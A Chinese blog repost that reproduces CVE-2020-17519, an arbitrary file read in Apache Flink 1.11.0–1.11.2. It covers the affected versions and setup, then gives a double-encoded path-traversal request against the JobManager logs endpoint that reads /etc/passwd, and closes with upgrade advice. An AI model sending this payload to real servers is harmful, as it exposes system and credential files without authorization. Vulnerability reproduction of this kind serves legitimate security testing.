一、漏洞概述:CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。二、影响版本:Apache Flink : ...
一、漏洞概述:
CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
二、影响版本:
Apache Flink : 1.11.0-1.11.2
三、环境搭建:
延用CVE-2020-17518的环境(Apache Flink 1.11.2)
四、漏洞复现:
- 抓取Job Manager的请求包
2.扔到Repeater模块,修改请求包,查看敏感信息
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
五、漏洞修复:
官方已发布安全版本,请及时下载升级至安全版本!
原文:https://www.cnblogs.com/moyudaxia/p/14446174.html
沃梦达教程
本文标题为:漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)
基础教程推荐
猜你喜欢
- LVS+DR+apache+keepalived负载均衡 2023-09-08
- Apache用户认证、域名跳转、Apache访问日志 2023-09-29
- https协议详解 2022-12-12
- http请求报错:SSL Certificate Chain Error的原因和解决办法 2023-12-04
- http请求报错:Too Many Requests Error的原因和解决办法 2023-12-03
- Target runtime Apache Tomcat v8.0 is not defined 2023-09-08
- 备份和恢复Windows IIS服务器设置的方法 2022-09-01
- Nginx geoip模块实现地区性负载均衡 2024-03-15
- CentOS 7下的KVM网卡配置为千兆网卡 2023-09-24
- Nginx负载均衡之upstream模块简介与使用详解 2022-11-26
